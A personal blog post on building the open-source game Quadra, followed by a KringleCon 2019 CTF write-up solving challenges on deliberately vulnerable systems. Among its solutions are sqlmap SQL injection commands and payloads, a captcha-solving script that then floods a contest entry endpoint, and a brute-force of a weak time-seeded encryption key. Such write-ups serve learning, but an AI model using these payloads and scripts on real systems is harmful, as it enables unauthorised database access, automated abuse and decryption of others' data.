Quadra – Did You Play It?

In my youth I enjoyed LAN parties. One fun game we played was Quadra – a multiplayer Tetris where playing well sends extra blocks to your opponents, making it very stressful :D

https://github.com/quadra-game/quadra turns out it is open source and it’s out there!

Does it still build?

CentOS 7.7:

$ sudo yum install git
$ git clone https://github.com/quadra-game/quadra
$ sudo yum groupinstall "Development Tools" 
$ sudo yum install SDL2-devel boost-devel libpng-devel
$ cd quadra
$ autoreconf -i
$ ./configure
$ make

It DOES!

Does it run!?

$ QUADRADIR=. ./quadra

And I get a very nice window :)

Quadra in 2020! (Do note that it tries to talk to Google and SourceForge for updates and so on; try ./configure --disable-version-check.)

I could even launch one process to run a server and then another one and connect to localhost :) So multiplayer must surely work!

It’s a bit laggy – I recall it being very snappy back when I was da bomb at this game :)

I blame this on possibly having missed some dependency so it fell back to some slower code path, and/or maybe the graphics card in this laptop is not up to it (maybe it’s too new? It’s a Skylake GT2 HD Graphics 520).

Kringlecon 2019 Write-Up

The challenges!

Ho, the season to be jolly! I’ve been trying a few CTFs lately. It started with the Disobey 2020 puzzle to get the hacker ticket. Then there was OverTheWire‘s 2019 advent CTF. And finally this one, the SANS holiday hack challenge – KringleCon 2019. As of writing I got what felt like quite far in the Disobey one but got really stuck in the second keyhole. For OTW I found a similar but slightly easier challenge on the 6th of December, but did not manage to get the key. Most others except the first and challenge zero I didn’t really have time for. So with not so much progress elsewhere it was very nice to take a step back and try out KringleCon, where I managed to get a bit further!

TLDR
A short summary of the methods and answers for the objectives:
  1. talk to Santa: go up, up, up and click, click, click :)
  2. find turtle doves: mm they were in the union
  3. unredact: at the time I was on a ski holiday so I used Termux on my phone and installed pdf2txt there to unredact it :) Fun to use the phone :)
  4. windows event log outcome: clicked around until I found something that looked suspicious. I think it was a filename that looked sensitive.
  5. windows event log technique: parsed these with Python to print command_line and process_name, then read through the output
  6. network log – compromised system: got it to print IPs with python
  7. splunk: followed the chat, was quite a nice way to learn the tool. Finding the correct file in the archive was a bit tricky, had to read through the chats carefully several times :)
  8. steam tunnels: the physical key! Spent quite some time wandering around trying to find the key. Eventually gave up. Then tried again after making it into the sleigh shop and hey there it was :) Couldn’t really get the decoder to line up so used pixels mostly, took 5 times or so :)
  9. captcha: super fun, most fun. Hadn’t tensorflowed before. Followed the youtube and github repo basically. Used an 80core 365GB cloud instance from $dayjob for a short while as the 2core 2GB RAM instance I used was too small ;)
  10. scraps: hadn’t used sqlmap before either. First mapped out the page manually to find the forms. Then learnt about sqlmap --crawl :) Money shot for me was --eval="import requests;token=requests.get('https://studentportal.elfu.org/validator.php').text"
  11. elfscrow: So. Hard. Learnt a bit more assembly reading. Used IDA this time instead of my previous attempts with radare2. Wonder when I’ll get better at these :)
  12. sleigh shop door: also very fun to unlock those locks! Did not solve it in under 5 seconds, but I did manage the slower goal (under 3 minutes).
  13. filter out poisoned: ugh, this one was tedious. Actually for this and the previous one I did spend some time trying to learn the tools, but in the end found a write-up that was published too early (and later removed, but still in the Google cache..)

Getting on with it!

  • The PDF de-redaction I could do on my phone in Termux, just a pkg install pdftotext :)
  • The nyancat one took a bit more time than I should admit, primarily because I forgot how sudo works and what sudo -u does..
  • For the frosty keypad I got to write a small Python script (there was also a hint on a wall somewhere :)
#!/usr/bin/python3
import random

#numbers = [ 1, 3, 7 ]

results = []

length = 4
digits = 1337

# from https://linuxconfig.org/function-to-check-for-a-prime-number-with-python
def is_prime_number(x):
  if x >= 2:
    for y in range(2,x):
      if not ( x % y ):
        return(False)
  else:
    return(False)
  return(True)

# from https://trinket.io/python3/00754ec904
while len(results) < 1000:
    for digit in range(1):
        digits = ''.join(str(random.randint(0, 9)) for i in range(length))
        if "3" in digits and "1" in digits and "7" in digits and not "0" in digits and not "2" in digits and not "4" in digits and not "5" in digits and not "6" in digits and not "8" in digits and not "9" in digits:
            if digits not in results:
                if is_prime_number(int(digits)):
                    results.append(digits)
                    print(digits)

You’ll need to hit Ctrl+C when it doesn’t find any more solutions. It’s not the fastest, has unused bits, and I don’t know why it has the for digit in range(1) bit.
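
For reference, a deterministic version without the random guessing could look something like this (just a sketch, same constraints: four digits, only 1/3/7 with each appearing at least once, and prime):

#!/usr/bin/python3
# Sketch: enumerate 4-digit codes that use only the digits 1, 3 and 7
# (each appearing at least once) and keep the prime ones.
from itertools import product

def is_prime(n):
    return n >= 2 and all(n % d for d in range(2, int(n ** 0.5) + 1))

for combo in product("137", repeat=4):
    code = "".join(combo)
    if set(code) == {"1", "3", "7"} and is_prime(int(code)):
        print(code)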

On to the next challenge!:

  • The Windows event log file I just opened on a Windows machine and looked around
  • For the sysmon file I printed some interesting keys from the JSON with a tiny Python script:
#!/usr/bin/python3
import json

with open('sysmon-data.json') as json_file:
    data = json.load(json_file)
    for p in data:
        try:
            print(p['command_line'])
        except KeyError:
            print(p['process_name'])
  • For the splunk one I basically just followed the chats. A bit tricky to be fair! By luck I had already managed to download the correct file from the Archive but did not look at it deeply enough..
  • For the Graylog one I just clicked around. I liked the “quick table” feature, and that got me some of the answers fairly quickly without having to write more narrow searches. Quite a few steps were needed for this so it took some time. It was nice to get to compare Graylog and Splunk; I’ve only used a vanilla ELK stack before, and last at version 5. With that in mind the data discovery was for me a bit easier in Graylog.
  • Trail of tears I just beat the game on easy :) (edit: turns out one can solve this on hard)

Next one was a powershell one! The laser adjuster :P

Finally I got to get a bit familiar with PowerShell. I’m a lurker on r/sysadmin and very often there are PowerShell one-liners on display there. This was quite a fun one to be honest :) Kind of like using Python directly in the shell.

Some things I learnt were:

  • Get-History shows stuff! But no .bash_history so I actually wonder where this history is from? It’s not in .local/powershell…
  • Trying to bruteforce this one manually was very slow so I gave that up fairly quickly.
  • I tried to find a way into reading the python code that powered the website. Only found the process id but no open files visible. Would need to get root for that I suppose..
  • figured out how to -X POST a body for the gases!
  • hints in chat suggested powering off and on
  • $env has things!
  • Format-Hex -Path ./archive | Select-Object -First 1
    • magic number 50 4B 03 == zip
    • expand-archive
    • chmod +x
    • get-content riddle # Gives an md5sum
  • md5sum hunter
$files = Get-ChildItem -Path /home/elf/depths -Recurse -File
foreach ($file in $files)
{
    if ((Get-FileHash -Path $file.FullName -Algorithm MD5).Hash | Select-String 25520151A320B5B0D21561F92C8F6224) {
        $file
    }
}

Could have found this with a recursive grep for temperature -e angle -e param..

The solution:

(Invoke-WebRequest -Uri http://localhost:1225/api/off).RawContent
$correct_gases_postbody = @{O='6';H='7';He='3';N='4';Ne='22';Ar='11';Xe='10';F='20';Kr='8';Rn='9'}
(Invoke-WebRequest -Uri http://localhost:1225/api/gas -Method POST -Body $correct_gases_postbody).RawContent
(Invoke-WebRequest http://127.0.0.1:1225/api/angle?val=65.5).RawContent
(Invoke-WebRequest http://127.0.0.1:1225/api/temperature?val=-33.5).RawContent
(Invoke-WebRequest http://127.0.0.1:1225/api/refraction?val=1.867).RawContent
(Invoke-WebRequest -Uri http://localhost:1225/api/on).RawContent
(Invoke-WebRequest -Uri http://localhost:1225/api/output).RawContent

iptables

  • Iptables / smart bracelet one: I think I was close or even completed this, but Kent did not agree? Went back and tried this again slowly by first writing the commands in a text file
#1
sudo iptables -P FORWARD DROP

sudo iptables -P INPUT DROP

sudo iptables -P OUTPUT DROP

#2
# should this be in two lines? as the iptables output orders them related,established..
sudo iptables -A INPUT -m state --state ESTABLISHED,RELATED -j ACCEPT
sudo iptables -A OUTPUT -m state --state ESTABLISHED,RELATED -j ACCEPT

#3
sudo iptables -A INPUT -p tcp --dport 22 -s 172.19.0.225 -j ACCEPT

#4
sudo iptables -A INPUT -p tcp --dport 21 -s 0.0.0.0/0 -j ACCEPT
sudo iptables -A INPUT -p tcp --dport 80 -s 0.0.0.0/0 -j ACCEPT

#5
sudo iptables -A OUTPUT -p tcp --dport 80 -d 0.0.0.0/0 -j ACCEPT

#6
sudo iptables -A INPUT -i lo -j ACCEPT

Kent TinselTooth: Great, you hardened my IOT Smart Braces firewall!
  • Sled Route API: Got the login. Next up was to figure out which requests were bad and how to fill in 100 on the web page… Maybe one can figure out the firewall API? Hmm, played a bit with Elasticsearch.. then gave up.. and in the meantime went ahead to:

Sleigh Shop Door

  • Ah, this is fun! While poking through the web source after fixing the smart bracelet I found the URL to the sleigh shop. It had a bunch of locks.
haha! if you reload the page the codes needed are different!

1. B46DU583 - top of the console
2. XNUBLBKW - see it by looking at the print preview (Ctrl+P)
3. unknown, fetched but never shown..

ha, this was funneh: clicking around the tabs I found a JavaScript file that needed some deobfuscation (jsnice.org), and that revealed var _0x1e21

so I ran that in the console with the values found in if statements and eventually:

console.log(_0x1e21["jIdunh"]);

 and it printed a bunch of things, and element 34 had an image:

console.log(_0x1e21["jIdunh"][34]);
VM3008:1 images/73cda8f4-6dc7-4edc-adb8-b2bd4b3ecd12.png

which was an image with the combination to the 3rd lock

4. ILMJRNTP - found in local storage
5. CJ4WCMG4 - in the <title></title>
6. from the card.. Y3WJVE01 on the sticker - but if one removes the hologram CSS the letters are in a different order: JYV0EW13
7. G7LDS1LS - font family
8. VERONICA - "In the event that the .eggs go bad, you must figure out who will be sad." From client.js, deobfuscated to make it a bit more readable and then just read through
9. 8SEOGRW1 - chakra in the CSS file: https://sleighworkshopdoor.elfu.org/css/styles.css/73cda8f4-6dc7-4edc-adb8-b2bd4b3ecd12
10. component.swab - a bunch of things around lock c10

finding .locks > li > .lock.c10 .cover

one can remove the cover

on the board there's a code: KD29XJ37

but all the other codes have been per session..

console.log says "Missing macaroni"

In the code there's:

 console["log"]("Well done! Here's the password:");
 console[_0x1e21("0x45")]("%c" + args["reward"], _0x1e21("0x46"));

In the console there's this whenever one presses the unlock:

73cda8f4-6dc7-4edc-adb8-b2bd4b3ecd12:1 Error: Missing macaroni!
    at HTMLButtonElement.<anonymous> (73cda8f4-6dc7-4edc-adb8-b2bd4b3ecd12:1)
(anonymous) @ 73cda8f4-6dc7-4edc-adb8-b2bd4b3ecd12:1

there's a bunch of <div class="component gnome">, <div class="component mac"> and <div class="component swab"> elements with data-codes: XJ0 A33 J39

Dragging the components further down changed the error and printed this in the console:

Well done! Here's the password:
73cda8f4-6dc7-4edc-adb8-b2bd4b3ecd12:1 The Tooth Fairy
73cda8f4-6dc7-4edc-adb8-b2bd4b3ecd12:1 You opened the chest in 6291.088 seconds
73cda8f4-6dc7-4edc-adb8-b2bd4b3ecd12:1 Well done! Do you have what it takes to Crack the Crate in under three minutes?
73cda8f4-6dc7-4edc-adb8-b2bd4b3ecd12:1 Feel free to use this handy image to share your score!
  • Doing the combination locks in under 3 minutes I think can be done manually.
    • But a nice thing to do would be to enter a bunch of commands into the browser console to help with some of it programmatically. Maybe one can enter JavaScript to also fill the numbers into the locks??
console.log(document.title)
some are maybe fixed??:
VERONICA
KD29XJ37

However, after doing that as fast as I could manually:

You opened the chest in 150.151 seconds
621c8819-1d6a-4d77-bd41-5214a6beccf5:1 Very impressive!! But can you Crack the Crate in less than five seconds?
621c8819-1d6a-4d77-bd41-5214a6beccf5:1 Feel free to use this handy image to share your score!
  • For that I’m thinking burp suite to automate the browser is needed?
  • When inside the Sleigh Shop there was a request to get the IP of the connection with the longest duration:
head conn.log | jq '.["id.orig_h"],.duration'
cat conn.log | jq -s -c 'sort_by(.duration)' > /tmp/sorted
cat /tmp/sorted # ... took forever, then just looked at the bottom:
                                                                                                                       {"ts":"2019-0
4-18T21:27:45.402479Z","uid":"CmYAZn10sInxVD5WWd","id.orig_h":"192.168.52.132","id.orig_p":8,"id.r                     esp_h":"13.107.21.200","id.resp_p":0,"proto":"icmp","duration":1019365.337758,"orig_bytes":3078192                     0,"resp_bytes":30382240,"conn_state":"OTH","missed_bytes":0,"orig_pkts":961935,"orig_ip_bytes":577                     16100,"resp_pkts":949445,"resp_ip_bytes":56966700}]   
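
A Python take on the same question (a sketch; it assumes conn.log is one JSON object per line, which is what the jq commands above imply, and skips entries without a duration):

#!/usr/bin/python3
# Sketch: find the connection with the longest duration in a Zeek conn.log
# stored as newline-delimited JSON.
import json

longest = None
with open("conn.log") as f:
    for line in f:
        entry = json.loads(line)
        if "duration" not in entry:
            continue
        if longest is None or entry["duration"] > longest["duration"]:
            longest = entry

print(longest["id.orig_h"], longest["duration"])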

Finishing each challenge gives some tips for other challenges. There was a hint for the Sled Route API suggesting to use jq. And there was another saying that if you beat the Trail game on Hard there are more hints? Also beating the lock game in under 3 minutes gives another hint, I think..

  • Next one I managed was the key bitting one to get into the Steam Tunnels! There was a good talk on this topic with a link to https://github.com/deviantollam/decoding, and then I just used that and tried maybe 5 keys before finding the right one. GIMP is not my specialty but the decoders helped a bit. The image of the key was not discoverable until one got into the Sleigh Shop.

Image AI

And then we get to the CAPTCHA + TensorFlow madness! This was real fun; I haven’t had to do much with TensorFlow before. I did not have to read much at all about TensorFlow to get this going, I could basically just glue together the provided Python scripts.

Another very good KringleCon talk on this topic, https://www.youtube.com/watch?v=jmVPLwjm_zs&feature=youtu.be, led to a GitHub repo. Some other code and training images were found as soon as one got far enough into the Steam Tunnels. After not too much googling I managed to get the Python script to store the images from the CAPTEHA in a directory and then run the predict TensorFlow script from the GitHub repo against it. It was however too slow. Fortunately I had access to a machine with lots of cores, so moving all the data there and re-running the Python got it working for me. 2 oversubscribed cores and 2 GB RAM was too little; 80 dedicated single-server Skylake cores and 356 GB RAM completed it much faster. There were messages about the TensorFlow from pip not having been compiled with all the optimizations enabled. I suppose I could also have tried this with a GPU :) And the Python:

#!/usr/bin/env python3
# Fridosleigh.com CAPTEHA API - Made by Krampus Hollyfeld
import requests
import json
import sys
import os
import shutil
import base64

os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'
import tensorflow as tf
tf.logging.set_verbosity(tf.logging.ERROR)
import numpy as np
import threading
import queue
import time

def load_labels(label_file):
    label = []
    proto_as_ascii_lines = tf.gfile.GFile(label_file).readlines()
    for l in proto_as_ascii_lines:
        label.append(l.rstrip())
    return label

def predict_image(q, sess, graph, image_bytes, img_full_path, labels, input_operation, output_operation):
    image = read_tensor_from_image_bytes(image_bytes)
    results = sess.run(output_operation.outputs[0], {
        input_operation.outputs[0]: image
    })
    results = np.squeeze(results)
    prediction = results.argsort()[-5:][::-1][0]
    q.put( {'img_full_path':img_full_path, 'prediction':labels[prediction].title(), 'percent':results[prediction]} )

def load_graph(model_file):
    graph = tf.Graph()
    graph_def = tf.GraphDef()
    with open(model_file, "rb") as f:
        graph_def.ParseFromString(f.read())
    with graph.as_default():
        tf.import_graph_def(graph_def)
    return graph

def read_tensor_from_image_bytes(imagebytes, input_height=299, input_width=299, input_mean=0, input_std=255):
    image_reader = tf.image.decode_png( imagebytes, channels=3, name="png_reader")
    float_caster = tf.cast(image_reader, tf.float32)
    dims_expander = tf.expand_dims(float_caster, 0)
    resized = tf.image.resize_bilinear(dims_expander, [input_height, input_width])
    normalized = tf.divide(tf.subtract(resized, [input_mean]), [input_std])
    sess = tf.compat.v1.Session()
    result = sess.run(normalized)
    return result

# above is from predict_images_using_trained_model.py because python and import meh

###########

def main():
    yourREALemailAddress = "MYREALEmAEL@example.org"

    # Creating a session to handle cookies
    s = requests.Session()
    url = "https://fridosleigh.com/"

    json_resp = json.loads(s.get("{}api/capteha/request".format(url)).text)
    b64_images = json_resp['images']                    # A list of dictionaries eaching containing the keys 'base64' and 'uuid'
    challenge_image_type = json_resp['select_type'].split(',')     # The Image types the CAPTEHA Challenge is looking for.
    challenge_image_types = [challenge_image_type[0].strip(), challenge_image_type[1].strip(), challenge_image_type[2].replace(' and ','').strip()] # cleaning and formatting

    #print(b64_images)
    # 0 wipe unknown_images dir
    # why wipe it tho?
    try:
        shutil.rmtree('unknown_images')
    except FileNotFoundError:
        pass
    os.makedirs('unknown_images', exist_ok=True)
    # 1 write b64 to unknown_images dir

    imgcnt = 0
    for image in b64_images:
        imgcnt = imgcnt + 1
        content = image['base64']
        uuid = image['uuid']

        try:
           content=base64.b64decode(content)
           filename = "unknown_images/%s" % uuid
           with open(filename,"wb") as f:
                f.write(content)
                #f.write(content.decode("utf-8"))
        except Exception as e:
           print(str(e))
    #    if imgcnt > 10:
     #       break
    # 2 run the predict against it
    #  python3 predict_images_using_trained_model.py would have been fun instead we copy pasta
    # https://github.com/chrisjd20/img_rec_tf_ml_demo/blob/master/retrain.py talks about mobilenet and speed optimizations..

    # Loading the Trained Machine Learning Model created from running retrain.py on the training_images directory
    graph = load_graph('/tmp/retrain_tmp/output_graph.pb')
    labels = load_labels("/tmp/retrain_tmp/output_labels.txt")

    # Load up our session
    input_operation = graph.get_operation_by_name("import/Placeholder")
    output_operation = graph.get_operation_by_name("import/final_result")
    sess = tf.compat.v1.Session(graph=graph)

    # Can use queues and threading to speed up the processing
    q = queue.Queue()
    unknown_images_dir = 'unknown_images'
    unknown_images = os.listdir(unknown_images_dir)

    #Going to iterate over each of our images.
    for image in unknown_images:
        img_full_path = '{}/{}'.format(unknown_images_dir, image)

        print('Processing Image {}'.format(img_full_path))
        # We don't want to process too many images at once. 10 threads max
        while len(threading.enumerate()) > 10:
            time.sleep(0.0001)

        #predict_image function is expecting png image bytes so we read image as 'rb' to get a bytes object
        image_bytes = open(img_full_path,'rb').read()
        threading.Thread(target=predict_image, args=(q, sess, graph, image_bytes, img_full_path, labels, input_operation, output_operation)).start()

    print('Waiting For Threads to Finish...')
    while q.qsize() < len(unknown_images):
        time.sleep(0.001)

    #getting a list of all threads returned results
    prediction_results = [q.get() for x in range(q.qsize())]

    #do something with our results... Like print them to the screen.

    # 3 get a list of the uuids for each type
    good_images = []
    for prediction in prediction_results:
        print('TensorFlow Predicted {img_full_path} is a {prediction} with {percent:.2%} Accuracy'.format(**prediction))
        if prediction['prediction'] in challenge_image_types:
            good_images.append(prediction['img_full_path'].split('/')[1])
    # TensorFlow Predicted unknown_images/dc646068-e584-11e9-97c1-309c23aaf0ac is a Santa Hats with 99.86% Accuracy

    # 4 make a new b64_images csv list with the uuids
    print(challenge_image_types)
    print(good_images)
    good_images_csv = ','.join(good_images)

    '''
    MISSING IMAGE PROCESSING AND ML IMAGE PREDICTION CODE GOES HERE
    '''

    # This should be JUST a csv list image uuids ML predicted to match the challenge_image_type .
    #final_answer = ','.join( [ img['uuid'] for img in b64_images ] )
    final_answer = good_images_csv

    json_resp = json.loads(s.post("{}api/capteha/submit".format(url), data={'answer':final_answer}).text)
    if not json_resp['request']:
        # If it fails just run again. ML might get one wrong occasionally
        print('FAILED MACHINE LEARNING GUESS')
        print('--------------------\nOur ML Guess:\n--------------------\n{}'.format(final_answer))
        print('--------------------\nServer Response:\n--------------------\n{}'.format(json_resp['data']))
        sys.exit(1)

    print('CAPTEHA Solved!')
    # If we get to here, we are successful and can submit a bunch of entries till we win
    userinfo = {
        'name':'Krampus Hollyfeld',
        'email':yourREALemailAddress,
        'age':180,
        'about':"Cause they're so flippin yummy!",
        'favorites':'thickmints'
    }
    # If we win the once-per minute drawing, it will tell us we were emailed.
    # Should be no more than 200 times before we win. If more, somethings wrong.
    entry_response = ''
    entry_count = 1
    while yourREALemailAddress not in entry_response and entry_count < 200:
        print('Submitting lots of entries until we win the contest! Entry #{}'.format(entry_count))
        entry_response = s.post("{}api/entry".format(url), data=userinfo).text
        entry_count += 1
    print(entry_response)


if __name__ == "__main__":
    main()

NEEEXT! Student body: finding some scrap papers (objective 9)

  • Got some hints in the game talking about sqlmap. Let’s play with that and learn about SQL injections :)
    • Started by looking at the page and reading the source code. Identified two forms on two pages that looked interesting.
    • First went down a rabbit hole of the sqlmap tamper scripts.
    • Just doing this:
#!/bin/bash
token=$(curl validation)
sqlmap --url="https://url?token=$token" -p variable
  • Got sqlmap to find that elfmail in the check.php was vulnerable.
  • a curl "https://url?elfmail=me@me.com'token=$token"
    • got a noice SQL error!
  • tamper investigation was not wasted because
#!/bin/bash
token=$(curl validation)
sqlmap --url="https://studentportal.elfu.org/application-check.php?elfmail=my%40example.com&token=$token" -p elfmail --eval="import requests;token=requests.get('https://studentportal.elfu.org/validator.php').text"
  • was needed to get sqlmap to find some techniques. Presumably the token only worked for the first tests.
#SNIPSNIP
Parameter: elfmail (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: elfmail=my@example.com' AND 2977=2977 AND 'tYvj'='tYvj&token=MTAwOTU4MTk3Njk2MTU3NzQ3MTgzOTEwMDk1ODE5Ny42OTY=_MTI5MjI2NDkzMDUwODgzMjMwNjYyMzI2LjI3Mg==

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: elfmail=me@example.com' AND (SELECT 4602 FROM(SELECT COUNT(*),CONCAT(0x7176786a71,(SELECT (ELT(4602=4602,1))),0x7162626a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'XazW'='XazW&token=MTAwOTU4MTk3Njk2MTU3NzQ3MTgzOTEwMDk1ODE5Ny42OTY=_MTI5MjI2NDkzMDUwODgzMjMwNjYyMzI2LjI3Mg==

Could not get the above queries to work in a curl.. maybe some escape mess-up. But sqlmap --users finds stuff:

[18:51:19] [INFO] retrieved: 'elfu'
[18:51:20] [INFO] retrieved: 'applications'
[18:51:21] [INFO] retrieved: 'elfu'
[18:51:22] [INFO] retrieved: 'krampus'
[18:51:23] [INFO] retrieved: 'elfu'
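
About the curl escaping: a hedged sketch of replaying the boolean-blind payload from the sqlmap output above with Python requests instead, which URL-encodes the parameters for you and fetches a fresh token first (the same idea as the --eval trick):

#!/usr/bin/python3
# Sketch: replay a boolean-blind style payload with a freshly fetched token,
# letting requests handle the URL encoding that tripped up my curl attempts.
import requests

base = "https://studentportal.elfu.org"
token = requests.get(base + "/validator.php").text

params = {
    "elfmail": "my@example.com' AND 2977=2977 AND 'tYvj'='tYvj",  # payload from the sqlmap output above
    "token": token,
}
r = requests.get(base + "/application-check.php", params=params)
print(r.status_code, len(r.text))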

sqlmap had a nice --sql-shell and with that one could “select * from elfu.krampus”, which got us some paths:

select * from elfu.krampus [6]:
[*] /krampus/0f5f510e.png, 1
[*] /krampus/1cc7e121.png, 2
[*] /krampus/439f15e6.png, 3
[*] /krampus/667d6896.png, 4
[*] /krampus/adb798ca.png, 5
[*] /krampus/ba417715.png, 6

Now then, that looks like an OS path; need to run a shell command.. but on a whim I tried https://studentportal.elfu.org/krampus/ and yay, found them there. Fired up good old GIMP and learnt about the rotate tool :P Yay, one more objective!

Remaining are reversing some crypto Windows executable and banning the IPs in the firewall for the route API.

Crypto then. Hint is https://www.youtube.com/watch?v=obJdpKDpFBA&feature=youtu.be > https://github.com/CounterHack/reversing-crypto-talk-public

Running an encryption tells us it uses the Unix epoch as a seed, and a hint for the challenge was “We know that it was encrypted on December 6, 2019, between 7pm and 9pm UTC.” That is from 1575658800 to 1575666000. There are some super_secure_random and super_secure_srand functions found with IDA Freeware. Probably they are not super. https://docs.microsoft.com/en-us/windows/win32/api/wincrypt/nf-wincrypt-cryptimportkey for example is one in use. I wonder what the difference with --insecure is? One error talks about DES-CBC, which the internet says is insecure. It uses 56 bits and 8 bytes. The stack of do_encrypt also says “dd 8” so yay?
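
A quick sanity check of that time window in Python (just converting the stated UTC times to epoch seconds):

#!/usr/bin/python3
# Sanity check: December 6, 2019, 19:00-21:00 UTC as Unix epoch seconds.
from datetime import datetime, timezone

start = datetime(2019, 12, 6, 19, 0, tzinfo=timezone.utc)
end = datetime(2019, 12, 6, 21, 0, tzinfo=timezone.utc)
print(int(start.timestamp()), int(end.timestamp()))  # 1575658800 1575666000
print(int(end.timestamp() - start.timestamp()))      # 7200 seconds in the window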

00000000 ; [00000008 BYTES. COLLAPSED UNION  _LARGE_INTEGER. PRESS CTRL-NUMPAD+ TO EXPAND]
00000000 ; [00000008 BYTES. COLLAPSED STRUCT $FAF74743FBE1C8632047CFB668F7028A. PRESS CTRL-NUMPAD+ TO EXPAND]

Which is used in security_init_cookie and imp__QueryPerformanceCounter. Way more than 8 bytes though.

While looking at these I listened to the YouTube talk and it said “running it at the same time generates the same key” – I tried that with two identical files and it generated the same key. What about two files with different checksums? Yep. Same. Encryption key. So the next step would be to try to encrypt something for every second between 1575658800 and 1575666000? That’s 7200 seconds, which would give us 7200 keys we could try to use to decrypt the file. Is it too much? Right now I’m thinking the --insecure flag might help if one uses Burp Suite to intercept the requests to the elfscrow API server? The time bit in the code uses time64.

call time into eax
then eax as a parameter into:
call super_secure_srand
there is a loop (8) and inside that it calls super_secure_random which looks complicated but by googling the numbers in decimal we find: https://rosettacode.org/wiki/Linear_congruential_generator#C

which has

rseed * 214013 + 2531011
# the disassembled code then does:
sar     eax, 10h
and     eax, 7FFFh

Which is also here: http://cer.freeshell.org/renma/LibraryRandomNumber/
And here I learnt that >> in Python is the sar.
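
In Python, one round of that generator then looks roughly like this (a sketch; the full key generator I ended up with is further down):

#!/usr/bin/python3
# One round of the MSVC-style LCG from the disassembly above:
#   rseed * 214013 + 2531011 ; sar eax, 10h ; and eax, 7FFFh
state = 1575658800                 # example: a seed from the time window
state = state * 214013 + 2531011
value = (state >> 16) & 0x7fff     # >> is the sar, & is the and
print(value, value & 0xff)         # only the low byte of each round goes into the key (see the generation loop below)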

After going for a walk I thought a bit about what the end goal here is. And it is not the key, but it could be. Right now the plan is to generate the secret-id, because the secret-id is what is used to decrypt with the tool, not the key. But maybe the uuid is something you only get from the escrow API server.

$ curl -XPOST http://elfscrow.elfu.org/api/store -d 1234567890abcdef
0e5b05dd-e132-42aa-b699-1829d3e23e2f
$ curl -XPOST http://elfscrow.elfu.org/api/retrieve -d 0e5b05dd-e132-42aa-b699-1829d3e23e2f
1234567890abcdef

Seems it is. And the hex needs to be in lowercase letters; ABCDEF did not fly. The UUID must be in this format: 00000000-0000-0000-0000-000000000000 it seems. Not sure about sqlmap use here. SSH and a web server are running, but SSH has been open on several previous addresses in this CTF too..

 WEBrick/1.4.2 (Ruby/2.6.3/2019-04-16) at
 elfscrow.elfu.org:443

Actually, what might be doable with just the key is to set up my own API server that just returns the key.. Change the address in the binary, or finally use Burp, or a local DNS override? Still need to figure out the key :))

Let’s try to read the do_encrypt again

  1. call read_file
  2. set some crypto vars
  3. call CryptAcquireContext
  4. call generate_key
    1. key goes into eax register I think
  5. call print_hex
  6. more crypto
  7. call CryptImport and CryptEncrypt
  8. call store_key and write_file
  9. call security_check_cookie

Generate_key does:

  1. call time
  2. call super_secure_srand, probably with file,time and seed as args
  3. loop 8 times and call super_secure_random to modify state?
call    ?super_secure_random@@YAHXZ ; super_secure_random(void)
movzx   ecx, al
and     ecx, 0FFh
mov     edx, [ebp+buffer]
add     edx, [ebp+i]
mov     [edx], cl

super_secure_srand does:
something with seed.. really unsure

super_secure_random does:
this is doing the rseed multiply, the sar and the and

The Key Writer

#!/usr/bin/python3


# key examples

# dcd5ed4c2acba87e
# 9f32148fe8ef55a8
# 0d2bac4df0a12e5a
# fa41fb5131993bf5

#https://www.aldeid.com/wiki/X86-assembly/Instructions/shr
# like the >> much more than ^

# https://rosettacode.org/wiki/Linear_congruential_generator#Python
def msvcrt_rand(seed):
    # 8 bytes of key: run the MSVC-style LCG and keep only the low byte of
    # each output (the movzx/and 0FFh in the disassembly) - the high parts
    # of consecutive outputs look very similar.
    state = seed
    keyarray = bytearray()
    for i in range(8):
        state = state * 0x343fd + 0x269ec3       # rseed * 214013 + 2531011
        keyarray.append((state >> 0x10) & 0xff)  # >> is the sar, & is the and
    return keyarray

seed = range(1575658800,1575666001)
# so not off by 1                ^
for rseed in seed:
  two = msvcrt_rand(rseed)
  print(two.hex())

Trying to edit the hosts file. As I use WSL I learnt that for .exe files I also need to update Windows' hosts file, even though I run them from inside WSL! Also, the syntax is NOT:

localhost elfscrow.elfu.org

(it needs the IP first, e.g. 127.0.0.1 elfscrow.elfu.org)

I got a bunch of false positives for some reason… when using the list of keys I generated, my localhost Flask API and the hosts file override. Anyway, I let this run and used file(1) to stop when it found a PDF. It stopped at 4849 (or the 4850th key in keys[] in my Python api.py, unsure if that is sorted..), so the creation time might have been 1575663650 (Friday, December 6, 2019 8:20:50 PM):

#!/bin/bash

# the Bruter

for i in $(seq 0 7200); do
  ./elfscrow.exe --decrypt --id=7debfae7-3a16-41e7-b211-678f5ebdce00 ElfUResearchLabsSuperSledOMaticQuickStartGuideV1.2.pdf.enc out.pdf --insecure
  if [ -f out.pdf ]; then
          isitpdf=$(file out.pdf|grep -c PDF)
          if [ "$isitpdf" != 0 ]; then
            echo $isitpdf
            echo "GOT IT $i"
            exit 123
          else
            mv -v out.pdf "falses/$i.pdf"
          fi
  fi
done

and the API.py

#https://stoplight.io/blog/python-rest-api/
from flask import Flask, json
import os

keys = ["b5ad6a321240fbec", "7200...", "7199", "..."]
api = Flask(__name__)

@api.route('/api/retrieve', methods=['POST'])
def get_companies():
  # store last key tested in a file

  statefile = "/root/elfscrow_status"
  with open(statefile,"r") as r:
    content = r.read()
    try:
      int(content)
    except ValueError:
      with open(statefile,"w+") as f:
        f.write("0")
      return("0")

    icontent = int(content)
    ncontent = int(content) + 1
    print("Last was %s, updating to %s" % (icontent, ncontent))

    with open(statefile,"w+") as f:
      f.write(str(ncontent))

  return str(keys[ncontent])
  #return json.dumps(companies)

if __name__ == '__main__':
    api.run(port=80)

Then getting the answer was just a pdf2txt away: the five-word sentence at the beginning of the document!

OK, THE ZEEK/BRO logs are the last one?

The username was found in https://srf.elfu.org/README.md

I started on this earlier but stopped because I wasn’t feeling it and it was a bit tedious.
The plan: make the queries programmatically. Also, this time, check the sizes of the requests – maybe that’s important. The times when attacks happen could be useful too?

Let’s try out RITA as indicated in a hint; I also found Malcolm while looking up this tool.. could be fun. But RITA at least couldn’t import the http.log :/

Weird that the IPs with the LFI, shellshock etc. haven’t POSTed.. maybe they POSTed later?
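
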